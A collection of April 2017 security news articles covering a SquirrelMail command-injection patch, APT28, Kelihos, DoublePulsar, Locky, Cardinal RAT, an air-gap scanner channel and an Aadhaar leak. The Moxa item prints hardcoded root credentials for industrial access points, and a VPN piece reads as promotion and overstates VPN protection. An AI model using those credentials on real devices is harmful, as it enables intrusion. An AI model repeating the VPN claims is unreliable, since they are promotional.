$envelopefrom = str_replace(array("\0","\n"),array('',''),$envelopefrom);
// save executed command for future reference
- $this->sendmail_command = "$sendmail_path $this->sendmail_args -f$envelopefrom";
+ $this->sendmail_command = escapeshellcmd("$sendmail_path $this->sendmail_args -f") .
escapeshellarg($envelopefrom);
// open process handle for writing
- $stream = popen(escapeshellcmd($this->sendmail_command), "w");
+ $stream = popen($this->sendmail_command, "w");
return $stream;
}
EOF
Golunski suggests SquirrelMail users of switching to a non-Sendmail transport, like SMTP.
Denmark blamed Russia APT28 group for cyber intrusions in Defense Ministry Emails
25.4.2017 securityaffairs APT
Denmark on Monday denounced Russia after the publication of a report that accused Russian APT28 of hacking the defense ministry’s email accounts.
Today the Danish Government officially blamed Russia for cyber attacks against its Defense Ministry. Denmark denounced a cyber intrusion in several Defense Ministry’s email accounts. The accusation comes after the publishing by the Centre for Cyber Security on Sunday of a report that accuses a Russian APT group of a security breach that affected emails of defense ministry employees in 2015 and 2016.“This is part of a continuing war from the Russian side in this field, where we are seeing a very aggressive Russia,” Defense Minister Claus Hjort Frederiksen told Danish news agency Ritzau.
According to the Ministry, the emails don’t contain secret information, but the intrusion represents a serious threat to the state.
“The hacked emails don’t contain military secrets, but it is of course serious,”
According to the report, hackers belonging to the notorious APT28 group (also known as Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team), were responsible for the cyber espionage campaign that targeted the Danish Defense Ministry.
The APT28 group was also involved in many other attacks against a number of European states, including Germany and France.
In Denmark, the Centre for Cyber Security said earlier this year that the threat against Danish authorities and companies remained “very high”.
US authorities indicted the suspected operator of the Kelihos Botnet
25.4.2017 securityaffairs BotNet
The Russian hacker Petr Levashov has been indicted in connection with the infamous Kelihos Botnet that was recently dismantled.
It isn’t a good period for Russian cyber criminals, last week Roman Valeryevich Seleznev, aka “Track2”, was sentenced to 27 years in prison, he was convicted of causing $170 million in damage by hacking into point-of-sale systems.
Today the United States Department of Justice announced that Peter Yuryevich Levashov (36) (also known as Petr Levashov, Peter Severa, Petr Severa and Sergey Astakhov) has been arrested a couple of weeks ago in Barcelona for his involvement with the infamous Kelihos botnet.
According to a research conducted by CheckPoint Security, a malware landscape was characterized by some interesting changed in this first part of 2017.
The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.
According to the DoJ statement, Levashov was charged last week with one count of causing intentional damage to a protected computer, one count of conspiracy, one count of accessing protected computers in furtherance of fraud, , two counts of fraud in connection with email, one count of wire fraud, one count of threatening to damage a protected computer, and one count of aggravated identity theft.
“A federal grand jury in Bridgeport, Connecticut, returned an eight-count indictment yesterday charging a Russian National with multiple offenses stemming from his alleged operation of the Kelihos botnet – a global network of tens of thousands of infected computers, which he allegedly used to facilitate malicious activities including harvesting login credentials, distributing bulk spam e-mails, and installing ransomware and other malicious software.” reads the statement.
The DoJ says Levashov sent spam urging recipients to buy shares as part of a “pump and dump” scam, among other naughtiness.
The indictment also alleges that the Russian hacker has used the Kelihos botnet for spam campaign that advertises various criminal schemes, including pump-and-dump stock fraud.
“On April 10, 2017, the Justice Department announced that it had taken action to dismantle the Kelihos botnet.” states the DoJ.
“An indictment is merely an allegation, and a defendant is presumed innocent unless and until proven guilty beyond a reasonable doubt in a court of law.”
Kelihos Botnet Author Indicted in U.S.
24.4.2017 securityweek BotNet
The alleged author of the Kelihos botnet has been charged in an eight-count indictment returned by a federal grand jury in Bridgeport, Connecticut, after being arrested in Spain earlier this month.
Peter Yuryevich Levashov, 36, a Russian national also known as Petr Levashov, Peter Severa, Petr Severa and Sergey Astakhov, was charged last week with one count of causing intentional damage to a protected computer, one count of conspiracy, one count of accessing protected computers in furtherance of fraud, one count of wire fraud, one count of threatening to damage a protected computer, two counts of fraud in connection with email, and one count of aggravated identity theft.
Levashov is accused of operating the Kelihos botnet, a global network of tens of thousands of infected computers. The botnet, which the Department of Justice says was dismantled earlier this month, was used in malicious activities such as the harvesting of login credentials, the distribution of bulk spam e-mails, and the spreading of ransomware and other malicious software.
The indictment also alleges that Levashov used the Kelihos botnet to send spam e-mails that advertise various criminal schemes, including pump-and-dump stock fraud (stocks were deceptively promoted to fraudulently increase their price).
At the time of the takedown, Kelihos was one of the largest botnets out there, after tripling in size in a 24-hour window last year. At the beginning of the year, the bot was observed packing worm-like spreading capabilities, and soon became the top malicious threat, according to Check Point’s Top 10 malware.
Levashov was arrested in Barcelona on April 7, 2017 and has been detained since. The Department of Justice is currently seeking his extradition.
Russian Hacker Gets 27-Year Prison Sentence
24.4.2017 securityweek Crime
A 32-year-old Russian cybercriminal was sentenced in the United States last week to 27 years in prison for hacking into point-of-sale (PoS) computers to steal credit card numbers.
Roman Valeryevich Seleznev, who was also known as Track2, was convicted in August 2016 of 38 counts related to his scheme to hack PoS endpoints: 10 counts of wire fraud, eight counts of intentional damage to a protected computer, nine counts of obtaining information from a protected computer, nine counts of possession of 15 or more unauthorized access devices and two counts of aggravated identity theft.
He is the son of Russian politician Valery Seleznev, who accused the US of kidnapping when the hacker was arrested in the Maldives in 2014. The laptop Seleznev had in his custody when arrested contained over 1.7 million stolen credit card numbers (initially said to be 2.1 million), along with additional evidence linking the Russian to the servers, email accounts and financial transactions involved in the scheme.
Seleznev’s computer hacking crimes caused more than $169 million in damage to small businesses and financial institutions, the Department of Justice claims. Between October 2009 and October 2013, the man hacked into retail PoS systems and installed malicious software to steal credit card numbers. Evidence revealed that Seleznev earned tens of millions of dollars from his criminal activity.
More than 500 U.S. businesses were affected by hacker, who sent the stolen data to servers that he controlled in Russia, the Ukraine and McLean, Virginia. Seleznev then sold the credit card information on various criminal “carding” websites to others who used them for fraudulent purchases, evidence introduced during the trial of the case revealed.
Seleznev mainly targeted small businesses, such as restaurants and pizza parlors in Western Washington, including Broadway Grill in Seattle, which went bankrupt after the cyber-attack. Overall, the hacker’s scheme affected around 3,700 financial institutions and caused more than $169 million in losses.
A separate indictment in the District of Nevada charges Seleznev with participating in a racketeer influenced corrupt organization (RICO) and conspiracy to engage in a racketeer influenced corrupt organization, and of two counts of possession of 15 or more counterfeit, along with unauthorized access devices. He is also charged in the Northern District of Georgia with conspiracy to commit bank fraud, one count of bank fraud and four counts of wire fraud.
Cyber Shield Act: A New Legislative Approach to Improving Cyber Security
24.4.2017 securityweek Cyber
The Cyber Shield Act is a legislative proposal designed to cut "to the core of critical infrastructure cyber defense." It is proposed by Senator Edward J. Markey, Massachusetts -- but you won't find a draft bill anywhere yet.
Markey is taking the unusual route of working with the Institute for Critical Infrastructure Technology (ICIT) to test his ideas, locate problems and seek solutions. James Scott, ICIT senior fellow, told SecurityWeek, "Sen Markey's office is proposing the Cyber Shield Act, and we are introducing it for them... His office briefed us a few times and we were giving some advice on how they could make it more doable."
Whether it is, in fact, doable remains to be seen. Currently, there are only two sources for further information: a YouTube discussion of Markey taking and answering questions on his ideas; and an analysis by ICIT. Scott is certainly bullish about its potential: his analysis is sub-titled 'Is the Legislative Community Finally Listening to Cybersecurity Experts?'
The proposal is fundamentally different to most cyber security legislation. That legislation often seeks to impose minimum standards of security behavior on business -- such as the proposed Cybersecurity Disclosure Act of 2017, which will force cyber responsibility into the boardroom.
Instead, the Cyber Shield Act seeks to give the consumers of security products better and more accurate information on which to base their purchasing decisions. With more accurate information informing decisions, the theory is that manufacturers and vendors will build better security into their products. Two particular aspects of the proposed Act highlight this.
The first is a requirement for "security-by-design throughout the development lifecycle of each and every device" in accordance with NIST 800-160. An example, suggests the ICIT analysis, is that at "a bare minimum, manufacturers must harden device security be requiring consumers to change default credentials."
The second is a rating system that will apply measurement criteria or cybersecurity scores to individual devices. Neither of these ideas are new, and both are fraught with difficulty -- and their acceptability is made both simpler and yet more difficult to achieve by Markey's insistence that adherence to the Act's provisions will be voluntary.
It is worth noting that the UK government launched a similar rating approach in 2013, based on the BIS Kitemark. The assumption was that business would rapidly adopt the voluntary scheme in order to demonstrate their quality and gain competitive advantage. David Willetts, minister of state for universities and science, announced at the time, "The cyber standard will promote excellence in tackling cyber risks, help businesses better understand how to protect themselves, and ultimately increase the nation's collective cyber security." It didn't fly. Even the BIS web site does not today display its own kitemark on its home page.
ICIT is not unaware of the difficulties, especially with the rating system. It points out that even the highest rating will not guarantee security; that new attack vectors not necessarily considered in the original rating will evolve; that 'secure' devices can still be breached laterally from other devices; and that many IT components are manufactured outside of US jurisdiction. Nevertheless, it insists that it is achievable.
"An artificial intelligence system," suggests ICIT, "could even be trained to weigh the data and calculate accurate scores. Instead of a star system (i.e. 4/5, etc.), Cyber Shield might be more meaningful and effective with a confidence score (i.e. there is a 92% chance that this device collects, processes, and transmits data securely). In this manner, consumer action is limited, and consumer understanding (of the background technical processes) is minimized."
Security by design and ratings are not the only aspects of the proposed Cyber Shield Act; but they are perhaps the most difficult. Markey and the ICIT believe they can be achieved between government, NIST experts and the industry. One group not specifically included, however, are the CISOs and other security officers that rely on these products to secure their organizations.
SecurityWeek asked the ICIT if this was an omission, suggesting that perhaps the only group truly qualified and incentivized to adequately promote security are those who depend upon it; that is the CISOs. Legislation has a history of failing to achieve its objectives, while vendors have a history of lobbying government to reduce security requirements.
The suggestion, one in fact proposed by Martin Zinaich, the information security officer for the City of Tampa, is that what is needed is an information security professional association -- much like the medical industry has the AMA of medical practitioners.
Scott replied, "Right now what we need is legislation that makes sense and encourages organizations to be more cybersecurity-centric. This bill includes security by design, industry outreach and education. We do have CISO organizations, but unfortunately, they typically don't have the pull at their organization to do anything significant. This is the most doable legislation for cyber that I've ever seen, and its early enough in the life of it to be shaped and molded properly."
Zinaich, for his part, is not impressed. "This actually requires both ends of the political / practitioner spectrum," he told SecurityWeek "Think of the millions of model device types -- who could possibly pull something like this off? Only practitioners working in conjunction with government, to put out a standard and keep it up to date. And do we simply measure things without the infrastructure to correct it and/or keep it on course?"
He added, "I feel a bit like Nostradamus -- I said if the industry didn't professionalize the Government would. James Scott is right in his response to SecurityWeek; CISOs do not have the pull needed. And they will unlikely get it until either they professionalize or the government does it for them. Yet, this is another 'voluntary' program, and that is a fail. Information Security is not only the devices, although that is a big part of it, but it is how the devices are installed and used, and how the business is or is not a partner in Information Security."
Zinaich is clear -- business should not be left out of this Act; and it is the CISOs, preferably led by a professional CISO association, that should provide the voice of business.
The proposed Cyber Shield Act is an ambitious project. There will be those, like Zinaich, who will doubt it can be effective. Nevertheless, the ICIT remains positive. "Cyber Shield," it concludes, "could be a catalyst to incite responsible cybersecurity adoption and implementation throughout multiple manufacturing sectors." Time will tell whether Senator Markey, with the help and advice of the ICIT, will succeed in solving the problems involved.
Hackers Are Using NSA's DoublePulsar Backdoor in Attacks
24.4.2017 securityweek BigBrothers
A hacking tool allegedly used by the NSA-linked threat actor “Equation Group” that was exposed to the public roughly a week ago has been already observed in live attacks.
Dubbed DoublePulsar, the backdoor was released by the Shadow Brokers hacker group on Friday before the Easter holiday, as part of a password-protected archive containing a larger set of tools and exploits. Last week Microsoft said that the newly revealed exploits don’t affect up-to-date systems.
DoublePulsar is the primary payload in SMB (Server Message Block) and RDP (Remote Desktop Protocol) exploits in the NSA’s FuzzBunch software, an exploitation framework similar to Metasploit, penetration tester zerosum0x0 explains.
This sophisticated, multi-architecture SMB backdoor can hide on a system and avoid alerting built-in defenses. An attacker could infect a system and return to it after a desired period of time to perform more intrusive actions.
MWR InfoSecurity's Countercept group also notes that DoublePulsar appears to be a very stealthy kernel-mode payload, while also revealing that it is dropped by default by many exploits. The backdoor, they say, can be used to inject arbitrary DLLs into user land processes.
Following in-depth analysis, Countercept discovered that the malware would enumerate processes to find the suitable one for injecting the user land DLL and execute code. They also discovered that the payload would wipe memory for evasion, though parts of the code would remain unwiped, it seems.
The firm also decided to build a script to detect the presence of both SMB and RDP versions of the DoublePulsar implant, so as to help people find compromises in their networks. “It re-implements the ping command of the implant, which can be used remotely without authentication, in order to determine if a system is infected or not,” they explain.
On April 18, after using the masscan tool developed by @ErrataRob to find 5,502,460 unique hosts with an open port 445 (SMB port), Below0Day used Countercept’s detection script to detect 30,626 hosts with DoublePulsar SMB implant. On April 21, the same scan revealed 5,190,506 exposed hosts and 56,586 infections, most of which were located in the United States.
This shows that the exploit is actively used in infection campaigns, and the number of compromised hosts appears to be growing fast, most probably as more actors are starting using the implant in their assaults.
Hardcoded Credentials Give Attackers Full Access to Moxa APs
24.4.2017 securityweek Vulnerebility
Taiwan-based industrial networking, computing and automation solutions provider Moxa has released an update for some of its wireless access points (APs) to address a critical vulnerability that can be exploited by hackers to gain complete control of affected devices.
Researchers at Cisco’s Talos intelligence and research group have analyzed Moxa’s AWK-3131A AP/bridge/client product, which is recommended for any type of industrial wireless application, and discovered hardcoded credentials corresponding to an account that cannot be disabled or removed.
Moxa AP
According to researchers, an attacker can leverage the username “94jo3dkru4” and the password “moxaiwroot” to log in to an undocumented account that provides root privileges.
The flaw, tracked as CVE-2016-8717, has been patched by Moxa with a software update. Users who cannot immediately apply the patch have been advised by Cisco to disable remote access services such as SSH and Telnet.
Experts at Cisco have identified a significant number of vulnerabilities as part of their research into Moxa’s AWK-3131A product. The list includes authentication issues that allow dictionary attacks and session hijacking, many cross-site scripting (XSS) vulnerabilities in the web interface, information disclosure bugs, denial-of-service (DoS) flaws, and several command injections.
Learn More at SecurityWeek's 2017 Singapore ICS Cyber Security Conference
Technical details on the other security holes were made public earlier this month after Moxa had released fixes. CVE-2016-8717 was mentioned in Cisco’s initial advisory, but its details were not disclosed to prevent potential attacks.
Cisco said Moxa has been very cooperative and it even gave researchers access to some of its source code.
Denmark Says Russia Hacked Defense Ministry Emails
24.4.2017 securityweek BigBrothers
Denmark on Monday denounced Moscow's "aggressive" behavior after a report accused Russian hackers of infiltrating the defense ministry's email accounts.
"This is part of a continuing war from the Russian side in this field, where we are seeing a very aggressive Russia," Defense Minister Claus Hjort Frederiksen told Danish news agency Ritzau.
A report published Sunday by the Centre for Cyber Security accused a group of pro-Kremlin hackers of breaking into the emails of defense ministry employees in 2015 and 2016.
"The hacked emails don't contain military secrets, but it is of course serious," Frederiksen said.
The report identified the hacker group as APT28, also known as Pawn Storm, Sofacy and Fancy Bear, which has links to the Russian government and security services and has previously been named by the FBI and US Homeland Security as being behind "malicious cyber activity" against US government bodies.
The group is also believed to be behind other high-profile cyber attacks.
In Denmark, the Centre for Cyber Security said earlier this year that the threat against Danish authorities and companies remained "very high".
Locky Ransomware Returns in New Necurs-driven Campaign
24.4.2017 securityweek Ransomware
Locky was the dominant ransomware in 2016, but was less active in the first quarter of 2017. Now the threat is back with a new Necurs-driven campaign, which was first spotted on April 21. Necurs is a major botnet with estimates last year of up to 1.7 million captive computers.
According to SophosLabs' telemetry, global spam volumes dropped dramatically just before Christmas 2016. At the time, Sophos global malware escalations manager Peter Mackenzie suggested, "The reason for this has not been conclusively proven, but the evidence points to a notorious botnet called Necurs going quiet."
On March 21, the same Sophos telemetry showed a sudden jump in global spam, with up to five times the background level of spam. Necurs was back. "Interestingly," suggested Sophos senior security advisor Paul Ducklin, "this time it isn’t malware that’s being blasted out, but an old-school type of scam that we’ve haven’t seen for a while, mainly because it didn’t work very well in the past: pump-and-dump."
Today, just one month later, Necurs has switched back to delivering the Locky ransomware. According to Talos, Locky is currently being distributed in high volumes. "Talos has seen in excess of 35K emails in the last several hours associated with this newest wave of Locky," blogged Nick Biasini, an outreach manager with Cisco Talos.
The new Locky campaign is similar to the majority of spam campaigns. A number of different emails are used, in this case largely designed around payments or receipts. An example email given by Talos has the subject 'Receipt#272'. There is no body to the mail; just an attached PDF with a name associated with the subject name; that is, 'P272.pdf'.
There seems to be either two concurrent campaigns, or two different methodologies to the same campaign. In one, the email subject remains constant only a couple of times before changing. In the other, the same subject line is used for tens of thousands of messages.
The technique used to deliver the Locky ransomware leverages the same methodology used in a recent Dridex campaign. The email attachment is a PDF; but contains little more than a .DOCM Word document with the same name as the PDF file. The Word document contains the macro that is used to pull down Locky and encrypt the files. In the example given by Talos, it was "an XOR'd Macro that downloaded the Locky sample from what is likely a compromised website."
"There are a couple of interesting aspects of using this technique one of which is requiring user interaction to get the sample to run, defeating many sandboxing technologies," writes Biasini. Since the malware is dormant until specifically activated by the user, it won't fire in the sandbox.
This new campaign shows the close relationship between Locky and Necurs. If Necurs isn't delivering Locky, Locky's incidence goes down. But it also demonstrates that dormancy in either does not mean the threat has gone away. It is back with a twist.
"For a time," writes Biasini, "PDF based compromise was down significantly and word macro based compromise up. In this campaign they figured out how to disguise a macro laden word doc in a PDF, compromising victims around the globe."
Cardinal RAT Remained Hidden for Two Years
24.4.2017 securityaffairs Virus
A recently discovered remote access Trojan (RAT) that abuses Excel macros in an innovative way has been active for more than two years, Palo Alto Networks security researchers reveal.
Dubbed Cardinal RAT, the malware had a very low volume over the two-year timeframe, with only 27 total samples found to date. The manner in which the threat is delivered, however, is both innovative and unique: malicious macros in Microsoft Excel documents are used to compile embedded C# (C Sharp) source code into an executable that downloads the RAT.
The delivery documents, which the Palo Alto Networks researchers refer to as the Carp downloader, use various financial-related lures to trick users into executing them. The malicious macros were designed to generate two paths, to a randomly named executable, and to a randomly named C# file in the %APPDATA%\\Microsoft folder.
Next, it base64-decodes the embedded C# source code and writes it to the C# file path, after which it compiles and executes the C# source code using the Microsoft Windows built-in csc.exe utility. The executed code simply downloads the Cardinal RAT from secure.dropinbox[.]pw using HTTP on port 443 (not HTTPS), decrypts it using AES-128, and then executes it.
The malware was named Cardinal RAT based on the internal names used by the author within the observed Microsoft .NET Framework executables, the security researchers reveal. Because only 27 unique samples of the RAT have been found, the malware managed to remain hidden although some of these samples are dating back to December 2015.
When executed on an infected system, the malware checks its current working directory and enters an installation routine if the directory doesn’t match the expected path. The threat copies itself to a randomly named executable in the specified directory, after which it compiles and executes embedded source code featuring watchdog functionality.
The newly spawned executable ensures that a specific registry key is set, and periodically queries the key to verify it is set appropriately and to re-set it if it has been deleted. This key acts as a persistence mechanism, as it ensures the RAT is executed every time a user logs on.
The watchdog process checks that the Cardinal RAT process is always running and that the executable is located in the correct path. If one of these conditions isn’t met, it either spawns a new instance of Cardinal RAT, or writes the malware to the correct location.
After completing the installation routine, the RAT injects itself into a newly spawned process, attempting to use one of six executables for this process: RegAsm.exe, RegSvcs.exe, vbc.exe, csc.exe, AppLaunch.exe, or cvtres.exe.
Some of the malware samples are configured with a single command and control (C&C) server, while others use multiple host and port combinations. Cardinal RAT parses a configuration, then attempts to connect to the C&C. Data is transmitted in two pieces: a DWORD specifying the data length, and the data itself, encrypted using a series of XOR and addition operations, followed by decompression using the ZLIB library, Palo Alto Networks reveals.
The RAT sends a wealth of information to the server, including username, hostname, campaign identifier, Microsoft Windows version, victim unique identifier, processer architecture, and malware version (1.4). It was designed to collect victim information, update settings and itself, act as a reverse proxy, execute commands, uninstall itself, recover passwords, download and execute new files, log keys, capture screenshots, and clean cookies from browsers.
Europol, European police agencies and private actors dismantled cybercrime ring
24.4.2017 securityaffairs CyberCrime
The Europol coordinated an international operation that dismantled a cybercrime ring that was offering services and tools to conceal malware.
The Europol dismantled a cybercrime ring as the result of a joint investigation conducted by Spanish and British law enforcement authorities (The Spanish National Police, the UK’s Regional Cyber Crime Unit for Tackling North West Serious Organised Crime (TITAN)) with the support of partners in the private sector. The activity was coordinated by the Europol Joint Cybercrime Action Taskforce (J-CAT), the law enforcement dismantled a criminal organization involved in the design, development and selling of sophisticated tools to cancel malware to security solutions.
The cybercrime ring developed a tool that was used by crooks worldwide to distribute Remote Access Trojans and key loggers. The criminal gang was offering for sale the tools on hacking forums.
“A joint investigation by Spanish and British law enforcement authorities, coordinated by Europol and its Joint Cybercrime Action Taskforce (J-CAT), has resulted in the dismantling of an international cybercrime group involved in the design, development and selling of sophisticated software tools to render all types of malicious malware infecting thousands of computers worldwide undetectable by security products.” reads the Press Release published by the Europol.
The European Police identified and arrested 5 individuals, 3 in Spain and 2 in the United Kingdom.
During searches in Spain, the investigators seized 6 hard drives, a laptop, 2 external storage devices, 8 Bitcoin mining devices and many documents.
The role of the Europol was crucial, the organization supported a two-years-long investigation that started at the end of 2015 by providing information exchange, operational coordination, forensic expertise and on-the-spot support.
cybercrime ring
The operation had two main phases, the first one carried out in the UK in April last year, that resulted in the arrest of two suspects, the second phase, carried out in Spain in April this year that led to 3 arrests.
“To support the actions on the spot, experts from Europol’s European Cybercrime Centre (EC3) were deployed to the UK and Spain. This allowed for real-time intelligence analysis and cross-checks against Europol’s databases, as well as forensic support.” reported the Europol.
According to the investigations, the cybercrime ring has been active since mid-2013, operating a very profitable business.
The experts at the Europol warn of growing use of cybercrime ring of encryption and anonymity services for illegal purposes and concealing their activities.
This phenomenon and other criminal trends were detailed in the Europol’s Internet Organised Crime Threat Assessment (IOCTA) 2016.
“The use of encryption by criminals to protect their communications or stored data represents a considerable challenge for law enforcement, denying access to essential intelligence and evidence. This is a cross-cutting issue that affects all crime areas. The growing regularity of native encryption on mobile devices compounds this problem” states the report.
Technical issue at the Jharkhand govt website caused the exposure of more than 1.4 million Aadhaar numbers
24.4.2017 securityaffairs Incindent
Personal information associated with more than a million Aadhaar numbers published on Jharkhand govt website due to a technical problem.
Digital identities of more than a million citizens have been exposed due to a coding error on a website maintained by the Jharkhand Directorate of Social Security.
“We got to know about it this week itself. Our programmers are working on it, and the matter should be addressed very soon,” said MS Bhatia, secretary of the state’s social welfare department.
The Jharkhand Directorate contains personal information of more than 1.6 million pensioners, the technical issue compromised citizen records containing names, addresses, Aadhaar numbers and bank account details of the beneficiaries of Jharkhand’s old age pension scheme.
“Their personal details are now freely available to anyone who logs onto the website, a major privacy breach at a time when the Supreme Court, cyber-security experts and opposition politicians have questioned a government policy to make Aadhaar mandatory to get benefits of a variety of government schemes and services.” reported the Hindustantimes.com.
The glitch exposed transaction-level data on pension paid to the citizens.
Aadhaar system
The Hindustantimes.com highlighted that the publishing of Aadhaar numbers is in contravention of Section 29 (4) of the Aadhaar Act.
Earlier this year, the Unique Identification Authority of India (UIDAI) blacklisted an Aadhaar service provider for 10 years due to a data leak that exposed the Aadhaar number of MS Dhoni, former captain of the Indian cricket team.
Incidents and abuses involving the Indian biometric ID system are not a rarity.
According to the Congress leader Jairam Ramesh the incident “makes a complete mockery of all that Jaitley and Ravi Shankar Prasad have said in Parliament.”
“Will the CEO of UIDAI take any action against the government of Jharkhand for making this dataset public? And if they don’t, does that mean they condone this act?” said Pranesh Prakash, policy director at the Centre for Internet and Society.
The Aadhaar is the world’s largest biometric ID system, with over 1.123 billion enrolled members as of 28 February 2017, it is mandatory to provide an Aadhaar number when filing income tax returns.
Unfortunately, according to Ramesh, the system caused several problems to people, in some cases citizens had been denied their legally mandated welfare entitlements.
Rusko špehovalo e-maily příslušníků dánské armády
24.4.2017 Novinky/Bezpečnost BigBrother
Rusko pomocí skupiny hackerů proniklo do systémů dánské armády a v letech 2015 a 2016 mělo přístup k e-mailům některých jejích příslušníků. Informoval o tom v neděli dánský list Berlingske s odvoláním na dánského ministra obrany Clause Hjorta Frederiksena.
Za útokem podle listu stála ruská státem kontrolovaná skupina hackerů ATP 28, která prý loni získala přístup k e-mailovým účtům americké Demokratické strany. "Nejde tu o malé skupinky hackerů, které by takové věci dělaly jen pro zábavu. Je to spojeno se zpravodajskými službami či ústředními elementy v ruské vládě," cituje list ministra.
Podle dánské zpravodajské služby představuje útok významné bezpečnostní riziko, a to mimo jiné proto, že informace získané z e-mailů by mohly být Ruskem využity k rekrutování agentů v dánské armádě, píše Berlingske.
Ops, hackers can exfiltrate data from air-gapped networks through a malware controlled via a scanner
24.4.2017 securityaffairs Hacking
A group of Israeli researchers has devised a new technique to exfiltrate data from a PC in an air-gapped network through malware controlled via scanners.
The team was composed of Ben Nassi, a graduate student at the Cyber Security Research Center at Ben-Gurion University, and his advisor Yuval Elovici, based on an idea of the prominent cryptographer Adi Shamir.
The technique could be used by hackers to establish a covert communication channel between a malicious code running on the target machine in an air-gapped network and the attacker.
The technique leverages a flatbed scanner used by the researchers to send commands to their malicious code running on the target victim’s network.
“Our method uses light transmitted by an attacker to a flatbed scanner, which is then extracted by a malware installed in the organization.” reads the paper published by the researchers. ” Our method exploits an organization’s scanner which serves as a gateway to the organization, in order to establish a covert channel between a malware and an attacker. The attacker controlling the light source can be located far away from the targeted scanner”
In order to transfer data from an air-gapped network, researchers use a light source near the scanner that then receives the commands.
The scanner detects reflected light on its glass pane and translates it into binary and convert it into an image. Scanners are sensitive to any changes of light in the surrounding environment, even when a paper is on the glass or when the light source is infrared.
The researchers transmitted the signal to the scanner by pointing a light at its glass pane. the commands are sent with a binary encoding obtained by turning on and off the light. The commands are included between specific binary sequences (1001).
According to the researchers, the attacker can also send messages to the malicious code by hijacking an existing light source installed in the vicinity of the scanner, let’s think of a smart bulb.
In the test conducted by the researchers, the team of experts was able to delete a file on the target system by sending the command “erase file xxx.doc” via a laser positioned on a stand outside a glass-walled building from 900 meters away.
In a real attack scenario, it is possible to use a drone equipped with a laser gun while flying outside an office window.
In order to successfully conduct such kind of attacks, it is necessary the presence of the malware on the target machine, and to receive the light a scanner with at least partially open lid must be connected to the PC.
In a real attack scenario, a malicious code could infect the target network, then scans it searching for scanners. In order to avoid detection, the scan could start at nighttime or during the weekend when the office is empty.
Let’s give a look at the speed of transmission obtained with this technique, it took 50 milliseconds to transmit each bit of the command.
This means that a 64-bit message took about three seconds to be transmitted, and the malware read the signal in real-time and acknowledged receipt by triggering a second scan once the command sequence ended.
In the test conducted by the Israeli researchers, the team used the technique to trigger a ransomware attack, sending the command to encrypt data from a car in the parking lot. The attacker controlled the fluctuating lightbulb via Bluetooth from a Samsung Galaxy S4.
“The driver held a Samsung Galaxy S4 while driving in order to perform the attack from, a dedicated application that we wrote and installed on the Galaxy. The application scans for a MagicBlue smart bulb and connects to it. After connection, the application modulates a given command as light sequence using a series of “on” (1 bit) and “off” (0 bit) signals sent from over a BLE channel” continues the paper.
The scanners used in the attack could detect changes in brightness from the smart bulb, a 5 percent reduction of light, and in sequences that lasted less than 25 milliseconds. An attack with this characteristic goes undetected to the human eyes.
The researchers say that a possible countermeasure to disconnect scanners from internal networks, but this solution is not feasible due to the impact on the ordinary work of the employees of a target company.
The best countermeasure consists in the setting up a proxy system whereby the scanner is connected by wire to a computer on the organization’s network that processes data from the scanner, in this way the scanner isn’t directly connected to the network.
“However, we believe that a proxy based solution will prevent the attacker from establishing such a covert channel without the need to apply extreme changes. The scanner will be connected by a wire directly (e.g., using a USB interface) to a computer (proxy) within the organization’s network instead of being connected to the network. The proxy will provide an API. When a scanning request is received, the computer initiates a scan and processes the output in a classifier in order to detect malicious scan” concluded the researchers.
Below the PoC videos of the attacks:
What Is Metadata Retention, And How Do You Maintain Your Privacy?
24.4.2017 securityaffairs Security
As Australia’s newly approved Data Retention law comes into effect, how does the law actually affect the average coutry internet user?
As Australia’s newly approved Data Retention law comes into effect, internet users across the country are frantically searching for a way to dodge government surveillance and ISP tracking. But how does the law actually affect the average Australian internet user? What is metadata anyway? And what can you do to protect your metadata?
Read on to get the answers to some of the most frequently asked questions following Australia’s Data Retention Law.
What Metadata Is?
In layman terms, Metadata is data about data. To put it more eloquently, Metadata describes a set of data, explaining how and when it was collected and by whom. It summarizes basic information about data, making it easier to find and work with particular instances of data.
What’s Included In The Metadata?
Metadata isn’t as much related to what you type on a handheld device or utter on the phone. Rather it is the trail of footprints you leave behind when you visit sites, download files, are online. Understandably, it can give ISPs, telecom companies, snoopers and government agencies everything about your internet activity.
What People Says About Metadata Retention?
It is safe to say that when it comes to online privacy, the average internet user in Australian still doesn’t grasp the implications of the new Data Retention law. In an interview with News.com.au, Dr Jake Goldenfein from Swinburne University of Technology explained,
“When it comes to your online data and the privacy protections afforded to it, there’s a lot we don’t know. Unfortunately we just don’t really know what ISPs are doing with data really. We don’t know if it’s being anonymised and sold, or the degree to which the data they collect is being regulated by privacy law because evidently it depends on the structure of the data bases through which it’s retained.”
While the average internet user in Australia would identify freedom as a constitutional right, many are unable to relate the concept with online freedom and privacy.
However, Digital Rights advocacy groups across Australia have proactively rallied against the law. They recently called for a “National Get A VPN Day” to emphasize upon internet users the importance of protecting their personal data, and online privacy and freedom.
How To Protect Your Data From Metadata Retention Law?
Now that you know the importance of Metadata in tracking your trail digital footprints, you should have also realized how easy it is for your ISP, Telecom Company or the Government to keep a tab on your online activity.
However, there are many ways you can actually wipe out this digital trail and avoid any awkward encounters with the authorities. To completely avoid metadata retention, VPN is the most effective and the cheapest way to prevent your data from ISPs, telecom companies and Govt. Agencies. You can protect your data by getting the most secure VPN service such as IVACY VPN, which is considered the best VPN for Australia to stop Metadata Retention.
How VPN Helps You In Protecting Your Personal Information?
Since all your data is encrypted during the data transfer process, there is no way it can be tracked or cracked by ISPs, telecom companies, government agencies or any other third-party for that matter.
Once you’re connected to a VPN, the only information about you that your ISP will be able to see is that you’re connected to a VPN server. All other personal information is encrypted with advanced security protocols of the VPN, making it impossible for your ISP to crack it.
It is understandable, therefore, why digital right groups in Australia promptly called for National Get A VPN Day right after the Data Retention law was passed.
Zákeřná Karmen: Tento ransomware by dokázala ovládat i vaše babička
23.4.2017 Živě.cz Viry
Jak složité je spustit ransomwarovou kampaň?
Karmen spíše než malware připomíná CRM systém
Ve webovém rozhraní se vyzná každý
Nejzákeřnějším typem virů je bez diskuze ransomware. Na rozdíl od obvyklého malwaru, který bude skrze váš počítač rozesílat spamy nebo se třeba pokoušet těžit bitcoiny, ale je v jeho zájmu, abyste jej vůbec neobjevili, ransomwaru si všimnete okamžitě. V tu chvíli je však už zpravidla pozdě.
Do nitra zákeřného ransomwaru. Takto vypadá útok na počítače personalistek
Ransomware totiž šifruje data oběti a poté vyžaduje výkupné. Jedinou spolehlivou obranou je tedy záloha všech osobních dokumentů a citlivých dat.
Zlaté oko
